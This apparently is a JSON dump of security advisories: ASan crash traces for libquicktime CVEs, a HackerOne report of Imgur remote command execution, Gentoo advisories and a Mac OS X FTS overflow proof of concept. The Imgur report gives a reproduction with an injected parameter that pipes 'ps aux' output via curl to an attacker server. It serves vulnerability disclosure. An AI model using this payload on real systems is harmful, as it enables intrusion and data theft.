at pc 0x7f9cb9ad16e7 bp 0x7ffcf9a1e720 sp 0x7ffcf9a1e718\r\nWRITE of size 1 at 0x602000009ce4 thread T0\r\n #0 0x7f9cb9ad16e6 in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69\r\n #1 0x7f9cb9ad3bdd in quicktime_read_dref /home/a/Downloads/libquicktime-1.2.4/src/dref.c:147\r\n #2 0x7f9cb9ad0388 in quicktime_read_dinf /home/a/Downloads/libquicktime-1.2.4/src/dinf.c:56\r\n #3 0x7f9cb9afdf09 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:220\r\n #4 0x7f9cb9afaa9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155\r\n #5 0x7f9cb9b4ff1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247\r\n #6 0x7f9cb9b0172a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221\r\n #7 0x7f9cb9896658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791\r\n #8 0x7f9cb989d4a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #9 0x7f9cb986e5da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #10 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #11 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #12 0x7f9cb7154ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #13 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\n0x602000009ce4 is located 12 bytes to the left of 1-byte region [0x602000009cf0,0x602000009cf1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f9cb9ad13ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66\r\n\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69 quicktime_read_dref_table\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 
fa\r\n 0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c047fff9390: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa 01 fa\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==41637==ABORTING\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9126\r\n\r\n\r\n###################################\r\n6.\r\nthe quicktime_user_atoms_read_atom function in useratoms.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4\r\n\r\n\r\n=================================================================\r\n==41642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cb1 at pc 0x7f3aa15d47f3 bp 0x7ffc98430d00 sp 0x7ffc98430cf8\r\nWRITE of size 1 at 0x602000009cb1 thread T0\r\n #0 0x7f3aa15d47f2 in quicktime_user_atoms_read_atom 
/home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84\r\n #1 0x7f3aa1590bd8 in quicktime_read_stsd_video /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:557\r\n #2 0x7f3aa1594eb8 in quicktime_read_stsd_table /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:694\r\n #3 0x7f3aa158bd4d in quicktime_finalize_stsd /home/a/Downloads/libquicktime-1.2.4/src/stsd.c:336\r\n #4 0x7f3aa1566147 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:231\r\n #5 0x7f3aa1562a9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155\r\n #6 0x7f3aa15b7f1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247\r\n #7 0x7f3aa156972a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221\r\n #8 0x7f3aa12fe658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791\r\n #9 0x7f3aa13054a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #10 0x7f3aa12d65da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #11 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #12 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #13 0x7f3a9ebbcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #14 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\n0x602000009cb1 is located 0 bytes to the right of 1-byte region [0x602000009cb0,0x602000009cb1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f3aa15d451a in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:81\r\n\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84 quicktime_user_atoms_read_atom\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 
0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c047fff9390: fa fa fa fa fa fa[01]fa fa fa 00 fa fa fa 00 04\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==41642==ABORTING\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9127\r\n\r\n\r\n###################################\r\n7.\r\nthe quicktime_video_width function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4\r\n\r\n\r\n=================================================================\r\n==10979==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009d00 at pc 0x7f36a1017a37 bp 0x7ffe65a90010 sp 0x7ffe65a90008\r\nREAD of size 4 at 0x602000009d00 thread T0\r\n #0 0x7f36a1017a36 in quicktime_video_width /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998\r\n #1 
0x7f36a1017a36 in quicktime_init_maps /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1633\r\n #2 0x7f36a101af13 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1891\r\n #3 0x7f36a10204a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #4 0x7f36a0ff15da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #5 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #6 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #7 0x7f369e8d7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #8 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\n0x602000009d00 is located 4 bytes to the right of 12-byte region [0x602000009cf0,0x602000009cfc)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f36a12543ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66\r\n\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998 quicktime_video_width\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9350: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9360: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9370: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd\r\n 0x0c047fff9380: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9390: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 04\r\n=>0x0c047fff93a0:[fa]fa 00 04 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\n 0x0c047fff93f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 
fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==10979==ABORTING\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9128\r\n\r\n\r\n\r\n\r\n=================================\r\n\r\n\r\nqflb.wu () dbappsecurity com cn\r\n\r\n\r\nProofs of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42148.zip\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42148/"}], "hackerone": [{"lastseen": "2018-04-19T17:34:08", "bulletinFamily": "bugbounty", "bounty": 5000.0, "description": "### Summary\n\nThe `y` parameter of `/edit/process` endpoint (with `a=crop`) is vulnerable to command-line argument injection to something that appears to be GraphicsMagick utility (probably `gm convert`). Due to GraphicsMagick's hacker-friendly processing of `|`-starting filenames supplied to `-write` option, it leads to command execution.\n\n### Reproduction steps\n\n0. Enable Burp Proxy or similar software that allows you to log and edit HTTP requests.\n1. Login into your imgur account and upload an image.\n2. Move your mouse over the image, click on the tiny button with pencil on it, then click \"Edit\".\n3. Select a random rectangle on the image, then click \"Apply\".\n4. 
In the burp suite, you will see a request to an URL like this: `http://<your-account>.imgur.com/edit/process?imageid=c9e1351c21542062f35a12130945210b&a=crop&x=0&y=0&w=700&h=746&random=4011802027746510`\n\n Change the `y` parameter of the request so it becomes `0 -write |ps${IFS}aux|curl${IFS}http://<your-server>${IFS}-d${IFS}@-`. \n\n The full URL after the change must look like `http://<your-account>.imgur.com/edit/process?imageid=c9e1351c21542062f35a12130945210b&a=crop&x=0&y=0%20-write%20|ps${IFS}aux|curl${IFS}http://<your-server>{IFS}-d${IFS}@-&w=700&h=830&random=9905392865702303`, note that you have to change `<your-server>` to a webserver under your control).\n\n5. Fire a request to the modified URL. The command (`ps aux|curl http://<your-server> -d @-`) will be executed somewhere inside imgur, and you will get a HTTP request to `<your-server>` with the result of `ps aux` in the POST body. You can replace `ps aux` with another command (but you have to write `${IFS}` instead of spaces).\n\n### Detailed description\n\nI was searching for CVE-2016-10033-like vulnerabilities on several bugbounty sites when I noticed strange behaviour of the mentioned parameter. The vulnerability exists because the user input (the contents of `y` GET parameter) goes into a shell command. While all special characters (like `|`, `$` and so on) seem to be escaped, the space character is not. This allows the attacker to insert additinal command line arguments. The common reason for such behaviour is `escapeshellcmd` PHP function, but that can also be some kind of custom input filtering/processing.\n\nThe rest of the exploitation depends on the program that is executed (we need to find out if it supports any dangerous command-line options). Common sense suggests that the external command launched by \"Crop/Resize\" function must be some image processing tool. 
The most popular one is ImageMagick/GraphicsMagick, so I appended ` -rotate 90` to the parameter and it succeded --- I saw lying Trump (I mean, the image was rotated). After more tries I was sure it's GraphicsMagick (probably `gm convert` utility). I read the documentation and found that `-write` argument supports perl-style filenames starting with a pipe --- in this case the rest of the filename must be a command to execute.\n\n### Mitigation\n\nProbably either some kind of custom processing or `escapeshellcmd` function is used to construct the command line. In both cases, replace it with applying `escapeshellarg` to individual arguments. In the second case, you probably want to run `grep -R escapeshellcmd <path to the source code>` to find more vulns :-)\n", "modified": "2017-04-26T21:30:28", "published": "2017-03-12T03:46:46", "id": "H1:212696", "href": "https://hackerone.com/reports/212696", "type": "hackerone", "title": "Imgur: RCE by command line argument injection to `gm convert` in `/edit/process?a=crop`", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2016-12-30T10:13:33", "bulletinFamily": "unix", "description": "### Background\n\nA SUID program that reduces the risk of security breaches by restricting the running environment of untrusted applications using Linux namespaces and seccomp-bpf. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Firejail. Please review upstream\u2019s release notes below for details. \n\n### Impact\n\nA remote attacker could possibly bypass sandbox protection, cause a Denial of Service condition, or change a system\u2019s DNS server. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Firejail users should switch to the newly added LTS version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-apps/firejail-lts-0.9.38.6\"\n \n\nUsers who want to stay on the current branch should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=sys-apps/firejail-0.9.44.2\"", "modified": "2016-12-27T00:00:00", "published": "2016-12-27T00:00:00", "id": "GLSA-201612-48", "href": "https://security.gentoo.org/glsa/201612-48", "type": "gentoo", "title": "Firejail: Multiple vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-12-13T09:58:27", "bulletinFamily": "unix", "description": "### Background\n\nPixman is a pixel manipulation library.\n\n### Description\n\nIn pixman-general, careless computations done with the \u2018dest_buffer\u2019 pointer may overflow, failing the buffer upper limit check. \n\n### Impact\n\nA remote attacker could possibly cause a Denial of Service condition, or execute arbitrary code with the privileges of the process. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Pixman users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=x11-libs/pixman-0.32.8\"", "modified": "2016-12-13T00:00:00", "published": "2016-12-13T00:00:00", "href": "https://security.gentoo.org/glsa/201612-37", "id": "GLSA-201612-37", "title": "Pixman: Buffer overflow", "type": "gentoo", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:58", "bulletinFamily": "exploit", "description": "", "modified": "2015-12-08T00:00:00", "published": "2015-12-08T00:00:00", "href": "https://packetstormsecurity.com/files/134710/Mac-OS-X-10.11-FTS-Buffer-Overflow.html", "id": "PACKETSTORM:134710", "type": "packetstorm", "title": "Mac OS X 10.11 FTS Buffer Overflow", "sourceData": "`MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow \nCredit: Maksymilian Arciemowicz ( CXSECURITY ) \nWebsite: \nhttp://cxsecurity.com/ \nhttp://cert.cx/ \n \n \nAffected software: \n- MACOS's Commands such as: ls, find, rm \n- iPhone 4s and later, \n- Apple Watch Sport, Apple Watch, Apple Watch Edition and Apple Watch Hermes \n- Apple TV (4th generation) \n- probably more \n \nApple file system suffer for a issue recognised in FTS library. The main problem occur when we create deep filesystem hierarchy. Unexpected behavior of many programs and invalid memory write seems really interesting. \n \nPoC: \nCreate an direcotry and perform the following actions: \n \n \n# for i in {1..1024}; do mkdir B && cd B; done \n... \ncd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory \n \n \nIf such error occur, don't panic script will continuing. When the script will finish, you need back to top of directory. E.g. \n \n \n# for i in {1..1024}; do cd .. ; done \n \n \nThen you can perform recursive 'ls' command. 
Let's run it ten times: \n \n \n# for i in {1..10}; do ls -laR > /dev/null; done \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nSegmentation fault: 11 \nSegmentation fault: 11 \nSegmentation fault: 11 \nls: B: No such file or directory \nls: B: No such file or directory \nSegmentation fault: 11 \nls: B: No such file or directory \nls: B: No such file or directory \n \n \ncrash randometly. Let's see valgrind and lldb \n \n \nLLDB: \n... \n/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. 
\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n \n./B/B/B/B/B/B/B/B/..../B/B: \nProcess 987 stopped \n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) \nframe #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \nlibsystem_c.dylib`strlen: \n-> 0x7fff97ab6d32 <+18>: pcmpeqb (%rdi), %xmm0 \n0x7fff97ab6d36 <+22>: pmovmskb %xmm0, %esi \n0x7fff97ab6d3a <+26>: andq $0xf, %rcx \n0x7fff97ab6d3e <+30>: orq $-0x1, %rax \n \n(lldb) x/x $rdi \nerror: memory read failed for 0xfeb66c00 \n(lldb) register read \nGeneral Purpose Registers: \nrax = 0x00000000ffffffff \nrbx = 0x00000000ffffffff \nrcx = 0x00000000feb66c08 \nrdx = 0x00000000feb66c08 \nrdi = 0x00000000feb66c00 \nrsi = 0x00007fff97afbb4d libsystem_c.dylib`__vfprintf + 2742 \nrbp = 0x00007fff5fbfe710 \nrsp = 0x00007fff5fbfe710 \n... \nrip = 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \n... 
\n(lldb) bt \n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) \n* frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \nframe #1: 0x00007fff97afc6e8 libsystem_c.dylib`__vfprintf + 5713 \nframe #2: 0x00007fff97b2535d libsystem_c.dylib`__v2printf + 669 \nframe #3: 0x00007fff97b095a9 libsystem_c.dylib`_vsnprintf + 596 \nframe #4: 0x00007fff97b0965e libsystem_c.dylib`vsnprintf + 80 \nframe #5: 0x00007fff97b3acc0 libsystem_c.dylib`__snprintf_chk + 128 \nframe #6: 0x00000001000024a8 ls`___lldb_unnamed_function16$$ls + 1564 \nframe #7: 0x0000000100001cfd ls`___lldb_unnamed_function14$$ls + 421 \nframe #8: 0x0000000100001a70 ls`___lldb_unnamed_function13$$ls + 2300 \nframe #9: 0x00007fff93cdb5ad libdyld.dylib`start + 1 \n \n=== Time for Valgrind ============= \n \nB/B/B/B/B/../B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. 
\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n \n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. 
\ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n==1009== Invalid write of size 1 \n==1009== at 0x1000126C3: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1002E034B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100001DAD: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== by 0x104809C8D: ??? \n==1009== Address 0x100ae9880 is 0 bytes after a block of size 1,280 alloc'd \n==1009== at 0x10000FEBB: malloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1002DFAB7: __fts_open (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100001B92: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== by 0x104809C8D: ??? 
